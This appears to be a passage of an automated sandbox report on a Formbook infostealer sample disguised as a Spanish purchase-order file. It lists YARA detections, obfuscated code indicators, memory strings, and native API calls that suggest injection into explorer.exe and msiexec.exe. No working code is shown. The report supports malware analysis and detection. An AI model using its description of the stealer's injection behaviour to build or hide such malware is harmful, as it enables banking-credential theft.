Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000007.00000002.3793412922.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3796185468.000000000869F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Solicitud de pedido Documento No 168646080.exe PID: 3180, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Solicitud de pedido Documento No 168646080.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 7484, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 2.2.Solicitud de pedido Documento No 168646080.exe.7070000.8.raw.unpack, -Module-.cs	Large array initialization: _206D_202D_206D_202D_206F_202C_200E_206B_202D_206C_206A_206A_202E_202D_202E_202E_206D_206A_200E_200B_206C_206B_202C_202A_202E_206C_206B_200E_200E_206F_202E_200E_200F_200D_202A_206C_202B_202C_206A_200D_202E: array initializer size 6656
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.371a190.6.raw.unpack, -Module-.cs	Large array initialization: _206D_202D_206D_202D_206F_202C_200E_206B_202D_206C_206A_206A_202E_202D_202E_202E_206D_206A_200E_200B_206C_206B_202C_202A_202E_206C_206B_200E_200E_206F_202E_200E_200F_200D_202A_206C_202B_202C_206A_200D_202E: array initializer size 6656

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Solicitud de pedido Documento No 168646080.exe

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A350 NtCreateFile,	6_2_0041A350
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A400 NtReadFile,	6_2_0041A400
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A480 NtClose,	6_2_0041A480
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A530 NtAllocateVirtualMemory,	6_2_0041A530
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A47C NtClose,	6_2_0041A47C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041A52A NtAllocateVirtualMemory,	6_2_0041A52A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2B60 NtClose,LdrInitializeThunk,	6_2_016A2B60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_016A2BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2AD0 NtReadFile,LdrInitializeThunk,	6_2_016A2AD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_016A2D30
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_016A2D10
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_016A2DF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_016A2DD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_016A2C70
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_016A2CA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2F30 NtCreateSection,LdrInitializeThunk,	6_2_016A2F30
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2FE0 NtCreateFile,LdrInitializeThunk,	6_2_016A2FE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2FB0 NtResumeThread,LdrInitializeThunk,	6_2_016A2FB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_016A2F90
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_016A2EA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_016A2E80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A4340 NtSetContextThread,	6_2_016A4340
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A4650 NtSuspendThread,	6_2_016A4650
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2BE0 NtQueryValueKey,	6_2_016A2BE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2BA0 NtEnumerateValueKey,	6_2_016A2BA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2B80 NtQueryInformationFile,	6_2_016A2B80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2AF0 NtWriteFile,	6_2_016A2AF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2AB0 NtWaitForSingleObject,	6_2_016A2AB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2D00 NtSetInformationFile,	6_2_016A2D00
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2DB0 NtEnumerateKey,	6_2_016A2DB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2C60 NtCreateKey,	6_2_016A2C60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2C00 NtQueryInformationProcess,	6_2_016A2C00
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2CF0 NtOpenProcess,	6_2_016A2CF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2CC0 NtQueryVirtualMemory,	6_2_016A2CC0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2F60 NtCreateProcessEx,	6_2_016A2F60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2FA0 NtQuerySection,	6_2_016A2FA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2E30 NtWriteVirtualMemory,	6_2_016A2E30
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A2EE0 NtQueueApcThread,	6_2_016A2EE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A3010 NtOpenDirectoryObject,	6_2_016A3010
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A3090 NtSetValueKey,	6_2_016A3090
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A35C0 NtCreateMutant,	6_2_016A35C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A39B0 NtGetContextThread,	6_2_016A39B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A3D70 NtOpenThread,	6_2_016A3D70
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A3D10 NtOpenProcessToken,	6_2_016A3D10
Source: C:\Windows\explorer.exe	Code function: 7_2_08687232 NtCreateFile,	7_2_08687232
Source: C:\Windows\explorer.exe	Code function: 7_2_08688E12 NtProtectVirtualMemory,	7_2_08688E12
Source: C:\Windows\explorer.exe	Code function: 7_2_08688E0A NtProtectVirtualMemory,	7_2_08688E0A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_04D02CA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_04D02C70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02C60 NtCreateKey,LdrInitializeThunk,	8_2_04D02C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02DD0 NtDelayExecution,LdrInitializeThunk,	8_2_04D02DD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_04D02DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_04D02D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_04D02EA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02FE0 NtCreateFile,LdrInitializeThunk,	8_2_04D02FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02F30 NtCreateSection,LdrInitializeThunk,	8_2_04D02F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02AD0 NtReadFile,LdrInitializeThunk,	8_2_04D02AD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02B60 NtClose,LdrInitializeThunk,	8_2_04D02B60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D035C0 NtCreateMutant,LdrInitializeThunk,	8_2_04D035C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D04650 NtSuspendThread,	8_2_04D04650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D04340 NtSetContextThread,	8_2_04D04340
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02CC0 NtQueryVirtualMemory,	8_2_04D02CC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02CF0 NtOpenProcess,	8_2_04D02CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02C00 NtQueryInformationProcess,	8_2_04D02C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02DB0 NtEnumerateKey,	8_2_04D02DB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02D00 NtSetInformationFile,	8_2_04D02D00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02D30 NtUnmapViewOfSection,	8_2_04D02D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02EE0 NtQueueApcThread,	8_2_04D02EE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02E80 NtReadVirtualMemory,	8_2_04D02E80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02E30 NtWriteVirtualMemory,	8_2_04D02E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02F90 NtProtectVirtualMemory,	8_2_04D02F90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02FB0 NtResumeThread,	8_2_04D02FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02FA0 NtQuerySection,	8_2_04D02FA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02F60 NtCreateProcessEx,	8_2_04D02F60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02AF0 NtWriteFile,	8_2_04D02AF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02AB0 NtWaitForSingleObject,	8_2_04D02AB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02BF0 NtAllocateVirtualMemory,	8_2_04D02BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02BE0 NtQueryValueKey,	8_2_04D02BE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02B80 NtQueryInformationFile,	8_2_04D02B80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D02BA0 NtEnumerateValueKey,	8_2_04D02BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D03090 NtSetValueKey,	8_2_04D03090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D03010 NtOpenDirectoryObject,	8_2_04D03010
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D03D70 NtOpenThread,	8_2_04D03D70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D03D10 NtOpenProcessToken,	8_2_04D03D10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D039B0 NtGetContextThread,	8_2_04D039B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAA350 NtCreateFile,	8_2_00BAA350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAA480 NtClose,	8_2_00BAA480
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAA400 NtReadFile,	8_2_00BAA400
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAA47C NtClose,	8_2_00BAA47C

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFC0EC	2_2_00BFC0EC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFEBA0	2_2_00BFEBA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06EAA318	2_2_06EAA318
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06EAC0E0	2_2_06EAC0E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE0034	2_2_06FE0034
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FEF7B0	2_2_06FEF7B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE6C48	2_2_06FE6C48
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE5BB8	2_2_06FE5BB8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE7B70	2_2_06FE7B70
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE7B60	2_2_06FE7B60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FEFB18	2_2_06FEFB18
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFAFE8	2_2_06FFAFE8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FF9CF0	2_2_06FF9CF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FF1450	2_2_06FF1450
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FF6510	2_2_06FF6510
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFC2B1	2_2_06FFC2B1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FF70E7	2_2_06FF70E7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFB879	2_2_06FFB879
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF658	2_2_06FFF658
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF64B	2_2_06FFF64B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFDFE0	2_2_06FFDFE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFAFD8	2_2_06FFAFD8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFDFD0	2_2_06FFDFD0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF3E0	2_2_06FFF3E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF3D0	2_2_06FFF3D0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFA0B0	2_2_06FFA0B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFA0A0	2_2_06FFA0A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF1C0	2_2_06FFF1C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFF1B0	2_2_06FFF1B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07300BF0	2_2_07300BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_0730174B	2_2_0730174B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_0730D25C	2_2_0730D25C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_0730101B	2_2_0730101B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07301006	2_2_07301006
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07300007	2_2_07300007
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07300040	2_2_07300040
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_0730108E	2_2_0730108E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_073080D7	2_2_073080D7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07307F78	2_2_07307F78
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07307F88	2_2_07307F88
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07303E37	2_2_07303E37
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07301D3F	2_2_07301D3F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07303B60	2_2_07303B60
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07303B51	2_2_07303B51
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07300BB9	2_2_07300BB9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07308978	2_2_07308978
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07308968	2_2_07308968
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_073079D8	2_2_073079D8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_073079C7	2_2_073079C7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_0730F8A0	2_2_0730F8A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_073707B8	2_2_073707B8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07370390	2_2_07370390
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07370380	2_2_07370380
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07376BF0	2_2_07376BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07376BE1	2_2_07376BE1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_073707C8	2_2_073707C8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07372D40	2_2_07372D40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07375818	2_2_07375818
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07303E48	2_2_07303E48
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041E84B	6_2_0041E84B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D9B6	6_2_0041D9B6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041EB6E	6_2_0041EB6E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041DCA1	6_2_0041DCA1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00402D87	6_2_00402D87
